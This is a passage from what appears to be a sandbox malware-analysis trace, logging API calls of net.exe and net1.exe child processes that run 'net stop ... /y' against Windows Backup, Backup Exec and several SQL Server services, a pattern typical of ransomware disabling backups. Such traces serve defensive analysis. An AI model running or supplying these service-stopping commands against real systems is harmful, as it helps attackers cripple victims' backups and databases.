arg=0x0, bufptr=0x22facc | out: bufptr=0x22facc) returned 0x0 [0116.897] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x22faa8 | out: Buffer=0x22faa8*=0x257728) returned 0x0 [0116.897] OpenServiceW (hSCManager=0x255488, lpServiceName="SDRSVC", dwDesiredAccess=0xc) returned 0x2555a0 [0116.897] QueryServiceStatus (in: hService=0x2555a0, lpServiceStatus=0x22fa7c | out: lpServiceStatus=0x22fa7c*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0116.897] GetServiceDisplayNameW (in: hSCManager=0x255488, lpServiceName="SDRSVC", lpDisplayName=0x3a1fc0, lpcchBuffer=0x22fa60 | out: lpDisplayName="Windows Backup", lpcchBuffer=0x22fa60) returned 1 [0116.898] NetApiBufferFree (Buffer=0x257728) returned 0x0 [0116.898] CloseServiceHandle (hSCObject=0x2555a0) returned 1 [0116.898] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.898] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0116.899] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The Windows Backup service is not started.\r\n") returned 0x2c [0116.900] GetFileType (hFile=0x0) returned 0x0 [0116.900] LocalAlloc (uFlags=0x0, uBytes=0x58) returned 0x256130 [0116.900] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Windows Backup service is not started.\r\n", cchWideChar=44, lpMultiByteStr=0x256130, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Windows Backup service is not started.\r\n", lpUsedDefaultChar=0x0) returned 44 [0116.900] WriteFile (in: hFile=0x0, lpBuffer=0x256130, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x22f9d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9d0, lpOverlapped=0x0) returned 0 [0116.900] LocalFree (hMem=0x256130) returned 0x0 [0116.900] GetFileType (hFile=0x0) returned 0x0 [0116.901] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x256130 [0116.901] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x256130, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n%", lpUsedDefaultChar=0x0) returned 2 [0116.901] WriteFile (in: hFile=0x0, lpBuffer=0x256130, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22f9d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9d0, lpOverlapped=0x0) returned 0 [0116.901] LocalFree (hMem=0x256130) returned 0x0 [0116.901] _ultow (in: _Dest=0xdc1, _Radix=2292224 | out: _Dest=0xdc1) returned="3521" [0116.901] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0116.901] GetFileType (hFile=0x0) returned 0x0 [0116.901] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x256130 [0116.901] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x256130, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n", lpUsedDefaultChar=0x0) returned 52 [0116.901] WriteFile (in: hFile=0x0, lpBuffer=0x256130, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x22f9dc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9dc, lpOverlapped=0x0) returned 0 [0116.901] LocalFree (hMem=0x256130) returned 0x0 [0116.901] GetFileType (hFile=0x0) returned 0x0 [0116.901] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x256130 [0116.901] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x256130, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n%", lpUsedDefaultChar=0x0) returned 2 [0116.901] WriteFile (in: hFile=0x0, lpBuffer=0x256130, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22f9dc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22f9dc, lpOverlapped=0x0) returned 0 [0116.901] LocalFree (hMem=0x256130) returned 0x0 [0116.901] NetApiBufferFree (Buffer=0x251ad0) returned 0x0 [0116.902] NetApiBufferFree (Buffer=0x251ae8) returned 0x0 [0116.902] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SDRSVC /y" [0116.902] exit (_Code=2) Process: id = "210" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6b068000" os_pid = "0xc60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "73" os_parent_pid = "0xe38" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 604 os_tid = 0xc14 [0116.864] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35feec | out: lpSystemTimeAsFileTime=0x35feec*(dwLowDateTime=0x1967c330, dwHighDateTime=0x1d6f0d1)) [0116.864] GetCurrentProcessId () returned 0xc60 [0116.864] GetCurrentThreadId () returned 0xc14 [0116.864] GetTickCount () returned 0x115083b [0116.864] QueryPerformanceCounter (in: lpPerformanceCount=0x35fee4 | out: lpPerformanceCount=0x35fee4*=23596485256) returned 1 [0116.864] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0116.864] __set_app_type (_Type=0x1) [0116.864] __p__fmode () returned 0x770331f4 [0116.864] __p__commode () returned 0x770331fc [0116.865] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0116.865] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0116.865] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.865] GetConsoleOutputCP () returned 0x1b5 [0116.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0116.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.870] sprintf_s (in: _DstBuf=0x35fea4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0116.870] setlocale (category=0, locale=".437") returned="English_United States.437" [0116.873] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0116.873] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.873] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" [0116.873] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fc70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0116.873] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x80) returned 0x7c3af8 [0116.873] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0116.873] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fe74 | out: Buffer=0x35fe74*=0x7c1b00) returned 0x0 [0116.873] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fe74 | out: Buffer=0x35fe74*=0x7c1b18) returned 0x0 [0116.873] _fileno (_File=0x77032900) returned -2 [0116.873] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0116.874] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0116.874] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0116.874] _wcsicmp (_String1="config", _String2="stop") returned -16 [0116.874] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0116.874] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0116.874] _wcsicmp (_String1="file", _String2="stop") returned -13 [0116.874] _wcsicmp (_String1="files", _String2="stop") returned -13 [0116.874] _wcsicmp (_String1="group", _String2="stop") returned -12 [0116.874] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0116.874] _wcsicmp (_String1="help", _String2="stop") returned -11 [0116.874] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0116.874] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0116.874] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0116.874] _wcsicmp (_String1="session", _String2="stop") returned -15 [0116.874] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0116.874] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0116.874] _wcsicmp (_String1="share", _String2="stop") returned -12 [0116.874] _wcsicmp (_String1="start", _String2="stop") returned -14 [0116.874] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0116.874] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0116.874] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0116.874] _wcsicmp (_String1="accounts", _String2="BackupExecAgentBrowser") returned -1 [0116.874] _wcsicmp (_String1="computer", _String2="BackupExecAgentBrowser") returned 1 [0116.874] _wcsicmp (_String1="config", _String2="BackupExecAgentBrowser") returned 1 [0116.874] _wcsicmp (_String1="continue", _String2="BackupExecAgentBrowser") returned 1 [0116.874] _wcsicmp (_String1="cont", _String2="BackupExecAgentBrowser") returned 1 [0116.874] _wcsicmp (_String1="file", _String2="BackupExecAgentBrowser") returned 4 [0116.874] _wcsicmp (_String1="files", _String2="BackupExecAgentBrowser") returned 4 [0116.874] _wcsicmp (_String1="group", _String2="BackupExecAgentBrowser") returned 5 [0116.874] _wcsicmp (_String1="groups", _String2="BackupExecAgentBrowser") returned 5 [0116.874] _wcsicmp (_String1="help", _String2="BackupExecAgentBrowser") returned 6 [0116.874] _wcsicmp (_String1="helpmsg", _String2="BackupExecAgentBrowser") returned 6 [0116.875] _wcsicmp (_String1="localgroup", _String2="BackupExecAgentBrowser") returned 10 [0116.875] _wcsicmp (_String1="pause", _String2="BackupExecAgentBrowser") returned 14 [0116.875] _wcsicmp (_String1="session", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="sessions", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="sess", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="share", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="start", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="stats", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="statistics", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="stop", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="time", _String2="BackupExecAgentBrowser") returned 18 [0116.875] _wcsicmp (_String1="user", _String2="BackupExecAgentBrowser") returned 19 [0116.875] _wcsicmp (_String1="users", _String2="BackupExecAgentBrowser") returned 19 [0116.875] _wcsicmp (_String1="msg", _String2="BackupExecAgentBrowser") returned 11 [0116.875] _wcsicmp (_String1="messenger", _String2="BackupExecAgentBrowser") returned 11 [0116.875] _wcsicmp (_String1="receiver", _String2="BackupExecAgentBrowser") returned 16 [0116.875] _wcsicmp (_String1="rcv", _String2="BackupExecAgentBrowser") returned 16 [0116.875] _wcsicmp (_String1="netpopup", _String2="BackupExecAgentBrowser") returned 12 [0116.875] _wcsicmp (_String1="redirector", _String2="BackupExecAgentBrowser") returned 16 [0116.875] _wcsicmp (_String1="redir", _String2="BackupExecAgentBrowser") returned 16 [0116.875] _wcsicmp (_String1="rdr", _String2="BackupExecAgentBrowser") returned 16 [0116.875] _wcsicmp (_String1="workstation", _String2="BackupExecAgentBrowser") returned 21 [0116.875] _wcsicmp (_String1="work", _String2="BackupExecAgentBrowser") returned 21 [0116.875] _wcsicmp (_String1="wksta", _String2="BackupExecAgentBrowser") returned 21 [0116.875] _wcsicmp (_String1="prdr", _String2="BackupExecAgentBrowser") returned 14 [0116.875] _wcsicmp (_String1="devrdr", _String2="BackupExecAgentBrowser") returned 2 [0116.875] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecAgentBrowser") returned 10 [0116.875] _wcsicmp (_String1="server", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="svr", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="srv", _String2="BackupExecAgentBrowser") returned 17 [0116.875] _wcsicmp (_String1="lanmanserver", _String2="BackupExecAgentBrowser") returned 10 [0116.875] _wcsicmp (_String1="alerter", _String2="BackupExecAgentBrowser") returned -1 [0116.875] _wcsicmp (_String1="netlogon", _String2="BackupExecAgentBrowser") returned 12 [0116.876] _wcsupr (in: _String="BackupExecAgentBrowser" | out: _String="BACKUPEXECAGENTBROWSER") returned="BACKUPEXECAGENTBROWSER" [0116.876] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7c54d8 [0116.881] GetServiceKeyNameW (in: hSCManager=0x7c54d8, lpDisplayName="BACKUPEXECAGENTBROWSER", lpServiceName=0x39aaf0, lpcchBuffer=0x35fe10 | out: lpServiceName="", lpcchBuffer=0x35fe10) returned 0 [0116.881] _wcsicmp (_String1="msg", _String2="BACKUPEXECAGENTBROWSER") returned 11 [0116.881] _wcsicmp (_String1="messenger", _String2="BACKUPEXECAGENTBROWSER") returned 11 [0116.881] _wcsicmp (_String1="receiver", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0116.882] _wcsicmp (_String1="rcv", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0116.882] _wcsicmp (_String1="redirector", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0116.882] _wcsicmp (_String1="redir", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0116.882] _wcsicmp (_String1="rdr", _String2="BACKUPEXECAGENTBROWSER") returned 16 [0116.882] _wcsicmp (_String1="workstation", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0116.882] _wcsicmp (_String1="work", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0116.882] _wcsicmp (_String1="wksta", _String2="BACKUPEXECAGENTBROWSER") returned 21 [0116.882] _wcsicmp (_String1="prdr", _String2="BACKUPEXECAGENTBROWSER") returned 14 [0116.882] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECAGENTBROWSER") returned 2 [0116.882] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECAGENTBROWSER") returned 10 [0116.882] _wcsicmp (_String1="server", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0116.882] _wcsicmp (_String1="svr", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0116.882] _wcsicmp (_String1="srv", _String2="BACKUPEXECAGENTBROWSER") returned 17 [0116.882] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECAGENTBROWSER") returned 10 [0116.882] _wcsicmp (_String1="alerter", _String2="BACKUPEXECAGENTBROWSER") returned -1 [0116.882] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECAGENTBROWSER") returned 12 [0116.882] NetServiceControl (in: servername=0x0, service="BACKUPEXECAGENTBROWSER", opcode=0x0, arg=0x0, bufptr=0x35fe0c | out: bufptr=0x35fe0c) returned 0x889 [0116.888] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0116.888] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0116.889] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0116.890] GetFileType (hFile=0x0) returned 0x0 [0116.890] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7c3ef8 [0116.890] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7c3ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n{", lpUsedDefaultChar=0x0) returned 30 [0116.890] WriteFile (in: hFile=0x0, lpBuffer=0x7c3ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fd4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd4c, lpOverlapped=0x0) returned 0 [0116.890] LocalFree (hMem=0x7c3ef8) returned 0x0 [0116.890] GetFileType (hFile=0x0) returned 0x0 [0116.890] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c61a0 [0116.890] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0116.890] WriteFile (in: hFile=0x0, lpBuffer=0x7c61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fd4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd4c, lpOverlapped=0x0) returned 0 [0116.890] LocalFree (hMem=0x7c61a0) returned 0x0 [0116.890] _ultow (in: _Dest=0x889, _Radix=3538300 | out: _Dest=0x889) returned="2185" [0116.890] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0116.890] GetFileType (hFile=0x0) returned 0x0 [0116.891] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7c61a0 [0116.891] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7c61a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0116.891] WriteFile (in: hFile=0x0, lpBuffer=0x7c61a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fd58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd58, lpOverlapped=0x0) returned 0 [0116.891] LocalFree (hMem=0x7c61a0) returned 0x0 [0116.891] GetFileType (hFile=0x0) returned 0x0 [0116.891] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c61a0 [0116.891] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0116.891] WriteFile (in: hFile=0x0, lpBuffer=0x7c61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fd58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fd58, lpOverlapped=0x0) returned 0 [0116.891] LocalFree (hMem=0x7c61a0) returned 0x0 [0116.891] NetApiBufferFree (Buffer=0x7c1b00) returned 0x0 [0116.891] NetApiBufferFree (Buffer=0x7c1b18) returned 0x0 [0116.891] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" [0116.891] exit (_Code=2) Process: id = "211" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x72376000" os_pid = "0xc94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLFDLauncher$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 605 os_tid = 0xddc Process: id = "212" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x66d7b000" os_pid = "0xc9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ReportServer$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 606 os_tid = 0xe40 Process: id = "213" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x72452000" os_pid = "0xcbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "156" os_parent_pid = "0x1044" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 607 os_tid = 0xe24 [0117.318] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfa74 | out: lpSystemTimeAsFileTime=0x2dfa74*(dwLowDateTime=0x19accb10, dwHighDateTime=0x1d6f0d1)) [0117.318] GetCurrentProcessId () returned 0xcbc [0117.318] GetCurrentThreadId () returned 0xe24 [0117.318] GetTickCount () returned 0x1150a00 [0117.318] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfa6c | out: lpPerformanceCount=0x2dfa6c*=23641934348) returned 1 [0117.319] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0117.319] __set_app_type (_Type=0x1) [0117.319] __p__fmode () returned 0x770331f4 [0117.319] __p__commode () returned 0x770331fc [0117.319] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0117.319] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0117.319] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.319] GetConsoleOutputCP () returned 0x1b5 [0117.320] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0117.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.323] sprintf_s (in: _DstBuf=0x2dfa2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0117.323] setlocale (category=0, locale=".437") returned="English_United States.437" [0117.325] GetStdHandle (nStdHandle=0xfffffff5) returned 0x47c [0117.325] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.325] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" [0117.325] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2df7f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0117.325] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x72) returned 0x43f650 [0117.326] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0117.326] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df9fc | out: Buffer=0x2df9fc*=0x441af0) returned 0x0 [0117.326] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2df9fc | out: Buffer=0x2df9fc*=0x441b08) returned 0x0 [0117.326] _fileno (_File=0x77032900) returned -2 [0117.326] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0117.326] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0117.326] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0117.326] _wcsicmp (_String1="config", _String2="stop") returned -16 [0117.326] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0117.326] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0117.326] _wcsicmp (_String1="file", _String2="stop") returned -13 [0117.326] _wcsicmp (_String1="files", _String2="stop") returned -13 [0117.326] _wcsicmp (_String1="group", _String2="stop") returned -12 [0117.326] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0117.326] _wcsicmp (_String1="help", _String2="stop") returned -11 [0117.326] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0117.326] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0117.326] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0117.326] _wcsicmp (_String1="session", _String2="stop") returned -15 [0117.326] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0117.326] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0117.326] _wcsicmp (_String1="share", _String2="stop") returned -12 [0117.326] _wcsicmp (_String1="start", _String2="stop") returned -14 [0117.326] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0117.326] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0117.326] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0117.326] _wcsicmp (_String1="accounts", _String2="MSOLAP$SQL_2008") returned -12 [0117.327] _wcsicmp (_String1="computer", _String2="MSOLAP$SQL_2008") returned -10 [0117.327] _wcsicmp (_String1="config", _String2="MSOLAP$SQL_2008") returned -10 [0117.327] _wcsicmp (_String1="continue", _String2="MSOLAP$SQL_2008") returned -10 [0117.327] _wcsicmp (_String1="cont", _String2="MSOLAP$SQL_2008") returned -10 [0117.327] _wcsicmp (_String1="file", _String2="MSOLAP$SQL_2008") returned -7 [0117.327] _wcsicmp (_String1="files", _String2="MSOLAP$SQL_2008") returned -7 [0117.327] _wcsicmp (_String1="group", _String2="MSOLAP$SQL_2008") returned -6 [0117.327] _wcsicmp (_String1="groups", _String2="MSOLAP$SQL_2008") returned -6 [0117.327] _wcsicmp (_String1="help", _String2="MSOLAP$SQL_2008") returned -5 [0117.327] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$SQL_2008") returned -5 [0117.327] _wcsicmp (_String1="localgroup", _String2="MSOLAP$SQL_2008") returned -1 [0117.327] _wcsicmp (_String1="pause", _String2="MSOLAP$SQL_2008") returned 3 [0117.327] _wcsicmp (_String1="session", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] _wcsicmp (_String1="sessions", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] _wcsicmp (_String1="sess", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] _wcsicmp (_String1="share", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] _wcsicmp (_String1="start", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] _wcsicmp (_String1="stats", _String2="MSOLAP$SQL_2008") returned 6 [0117.327] 